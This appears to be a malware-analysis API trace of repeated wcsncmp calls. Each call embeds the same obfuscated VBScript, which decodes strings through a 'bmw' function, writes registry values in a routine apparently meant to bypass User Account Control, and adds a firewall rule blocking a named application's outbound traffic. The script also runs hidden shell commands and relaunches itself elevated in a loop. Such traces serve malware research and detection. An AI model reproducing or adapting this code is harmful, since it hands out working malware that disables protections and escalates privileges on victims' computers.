bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.366] wcsncmp (_String1="\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.366] wcsncmp (_String1="\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.366] wcsncmp (_String1="newRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.367] wcsncmp (_String1="ewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.367] wcsncmp (_String1="wRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 